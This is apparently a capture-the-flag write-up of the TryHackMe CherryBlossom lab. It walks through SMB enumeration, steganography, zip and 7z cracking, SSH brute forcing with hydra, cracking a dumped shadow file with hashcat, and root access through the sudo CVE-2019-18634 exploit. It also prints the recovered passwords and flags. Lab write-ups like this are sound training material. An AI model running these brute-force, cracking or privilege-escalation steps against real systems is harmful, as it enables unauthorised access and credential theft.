Boot-to-root with emphasis on crypto and password cracking.
CherryBlossom
💢 We will cover the topics#
- Network Enumeration
- Web Enumeration
- Rerverse Engineering
- Brute Forcing (Zip)
- Brute Forcing (Hash)
- Brute Forcing (SSH)
- Brute Forcing (Hash)
- CVE-2019-18634 - Sudo 1.8.25p - ‘pwfeedback’ Buffer Overflow
Task 1 Flags#
Hack the machine and get the flags!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
| kali@kali:~/CTFs/tryhackme/CherryBlossom$ sudo nmap -A -sS -sC -sV -O 10.10.164.126
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-18 15:52 CEST
Nmap scan report for 10.10.164.126
Host is up (0.037s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 21:ee:30:4f:f8:f7:9f:32:6e:42:95:f2:1a:1a:04:d3 (RSA)
| 256 dc:fc:de:d6:ec:43:61:00:54:9b:7c:40:1e:8f:52:c4 (ECDSA)
|_ 256 12:81:25:6e:08:64:f6:ef:f5:0c:58:71:18:38:a5:c6 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/18%OT=22%CT=1%CU=44693%PV=Y%DS=2%DC=T%G=Y%TM=5F8C48
OS:BC%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=A)OP
OS:S(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST
OS:11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)EC
OS:N(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m38s, median: 1s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: cherryblossom
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: cherryblossom
|_ System time: 2020-10-18T14:53:00+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-18T13:53:00
|_ start_date: N/A
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 36.91 ms 10.8.0.1
2 37.17 ms 10.10.164.126
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.66 seconds
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
| kali@kali:~/CTFs/tryhackme/CherryBlossom$ sudo nmap --script smb-enum-shares -vv 10.10.164.126
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-18 15:54 CEST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
Initiating Ping Scan at 15:54
Scanning 10.10.164.126 [4 ports]
Completed Ping Scan at 15:54, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:54
Completed Parallel DNS resolution of 1 host. at 15:54, 0.00s elapsed
Initiating SYN Stealth Scan at 15:54
Scanning 10.10.164.126 [1000 ports]
Discovered open port 22/tcp on 10.10.164.126
Discovered open port 139/tcp on 10.10.164.126
Discovered open port 445/tcp on 10.10.164.126
Completed SYN Stealth Scan at 15:54, 0.71s elapsed (1000 total ports)
NSE: Script scanning 10.10.164.126.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 5.80s elapsed
Nmap scan report for 10.10.164.126
Host is up, received echo-reply ttl 63 (0.041s latency).
Scanned at 2020-10-18 15:54:21 CEST for 7s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
Host script results:
| smb-enum-shares:
| account_used: <blank>
| \\10.10.164.126\Anonymous:
| Type: STYPE_DISKTREE
| Comment: Anonymous File Server Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\samba
| Anonymous access: READ/WRITE
| \\10.10.164.126\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Samba 4.7.6-Ubuntu)
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
|_ Anonymous access: READ/WRITE
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.040KB)
|
1
2
3
4
5
6
7
8
9
10
11
| kali@kali:~/CTFs/tryhackme/CherryBlossom$ cat journal.txt | base64 -d > output
kali@kali:~/CTFs/tryhackme/CherryBlossom$ file output
output: PNG image data, 1280 x 853, 8-bit/color RGB, non-interlaced
kali@kali:~/CTFs/tryhackme/CherryBlossom$ stegpy output
File _journal.zip succesfully extracted from output
kali@kali:~/CTFs/tryhackme/CherryBlossom$ unzip _journal.zip
Archive: _journal.zip
file #1: bad zipfile offset (local header sig): 0
kali@kali:~/CTFs/tryhackme/CherryBlossom$ file _journal.zip
_journal.zip: JPEG image data
kali@kali:~/CTFs/tryhackme/CherryBlossom$ hexeditor _journal.zip
|
50 4B 03 04
1
2
3
4
| kali@kali:~/CTFs/tryhackme/CherryBlossom$ fcrackzip -uDp /usr/share/wordlists/rockyou.txt _journal2.zip
PASSWORD FOUND!!!!: pw == september
|
1
2
3
4
5
6
7
8
9
10
11
12
| kali@kali:~/CTFs/tryhackme/CherryBlossom$ john --wordlist=/usr/share/wordlists/rockyou.txt Journal.hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 5 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tigerlily (Journal.ctz)
1g 0:00:06:17 DONE (2020-10-18 16:17) 0.002645g/s 14.81p/s 14.81c/s 14.81C/s brownsugar..inferno
Use the "--show" option to display all of the cracked passwords reliably
Session completed
|
1
2
3
4
| Found this lying around an old computer my boss gave me to analyse. Couldn't figure it out.
Leaving it here. Hopefully all will become clear when I break the encryption:
THM{054a8f1db7618f8f6a41a0b3349baa11}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| kali@kali:~/CTFs/tryhackme/CherryBlossom$ hydra -l lily -P cherry-blossom.list ssh://10.10.164.126
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-18 16:20:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 9923 login tries (l:1/p:9923), ~621 tries per task
[DATA] attacking ssh://10.10.164.126:22/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 9747 to do in 00:55h, 16 active
[STATUS] 131.33 tries/min, 394 tries in 00:03h, 9533 to do in 01:13h, 16 active
[22][ssh] host: 10.10.164.126 login: lily password: Mr.$un$hin3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-18 16:26:38
|
lily:Mr.$un$hin3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
| lily@cherryblossom:/var/backups$ cat shadow.bak
root:$6$l81PobKw$DE0ra9mYvNY5rO0gzuJCCXF9p08BQ8ALp5clk/E6RwSxxrw97h2Ix9O6cpVHnq1ZUw3a/OCubATvANEv9Od9F1:18301:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
avahi-autoipd:*:17647:0:99999:7:::
usbmux:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
rtkit:*:17647:0:99999:7:::
speech-dispatcher:!:17647:0:99999:7:::
whoopsie:*:17647:0:99999:7:::
kernoops:*:17647:0:99999:7:::
saned:*:17647:0:99999:7:::
pulse:*:17647:0:99999:7:::
avahi:*:17647:0:99999:7:::
colord:*:17647:0:99999:7:::
hplip:*:17647:0:99999:7:::
geoclue:*:17647:0:99999:7:::
gnome-initial-setup:*:17647:0:99999:7:::
gdm:*:17647:0:99999:7:::
johan:$6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG.vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0:18301:0:99999:7:::
lily:$6$3GPkY0ZP$6zlBpNWsBHgo6X5P7kI2JG6loUkZBIOtuOxjZpD71spVdgqM4CTXMFYVScHHTCDP0dG2rhDA8uC18/Vid3JCk0:18301:0:99999:7:::
sshd:*:18301:0:99999:7:::
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| kali@kali:~/CTFs/tryhackme/CherryBlossom$ hashcat -m1800 -a0 --force johan.hash cherry-blossom.list
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz, 512/1493 MB allocatable, 2MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll'
Dictionary cache hit:
* Filename..: cherry-blossom.list
* Passwords.: 9923
* Bytes.....: 99495
* Keyspace..: 9923
$6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG.vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0:##scuffleboo##
Session..........: hashcat
Status...........: Cracked
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYm...UX7ob0
Time.Started.....: Sun Oct 18 16:32:19 2020 (14 secs)
Time.Estimated...: Sun Oct 18 16:32:33 2020 (0 secs)
Guess.Base.......: File (cherry-blossom.list)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 497 H/s (5.09ms) @ Accel:128 Loops:64 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 6912/9923 (69.66%)
Rejected.........: 0/6912 (0.00%)
Restore.Point....: 6656/9923 (67.08%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: #sharry#1992 -> #music28
Started: Sun Oct 18 16:32:02 2020
Stopped: Sun Oct 18 16:32:34 2020
|
##scuffleboo##
1
2
3
4
5
6
| lily@cherryblossom:/var/backups$ su - johan
Password:
johan@cherryblossom:~$ ls
user.txt
johan@cherryblossom:~$ cat user.txt
THM{cb064113d54e24dc84f26b1f63bf3098}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| kali@kali:~/CTFs/tryhackme/CherryBlossom$ wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
--2020-10-18 16:36:24-- https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.112.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.112.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6311 (6.2K) [text/plain]
Saving to: ‘exploit.c’
exploit.c 100%[==============================>] 6.16K --.-KB/s in 0s
2020-10-18 16:36:24 (15.2 MB/s) - ‘exploit.c’ saved [6311/6311]
kali@kali:~/CTFs/tryhackme/CherryBlossom$ gcc -o exploit exploit.c
kali@kali:~/CTFs/tryhackme/CherryBlossom$ scp exploit lily@10.10.164.126:/tmp
lily@10.10.164.126's password:
exploit 100% 17KB 219.7KB/s 00:00
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| johan@cherryblossom:/tmp$ ls
exploit
systemd-private-2586c949a40742cd82cc17cef867130f-bolt.service-Akgi7x
systemd-private-2586c949a40742cd82cc17cef867130f-colord.service-vt9iYH
systemd-private-2586c949a40742cd82cc17cef867130f-rtkit-daemon.service-HNdlwE
systemd-private-2586c949a40742cd82cc17cef867130f-systemd-resolved.service-iZIGSg
systemd-private-2586c949a40742cd82cc17cef867130f-systemd-timesyncd.service-SS3wup
johan@cherryblossom:/tmp$ ./exploit
[sudo] password for johan:
Sorry, try again.
# whoami
root
# cat /root/root.txt
THM{d4b5e228a567288d12e301f2f0bf5be0}
|
- Journal Flag
THM{054a8f1db7618f8f6a41a0b3349baa11}
- User Flag
THM{cb064113d54e24dc84f26b1f63bf3098}
- Root Flag
THM{d4b5e228a567288d12e301f2f0bf5be0}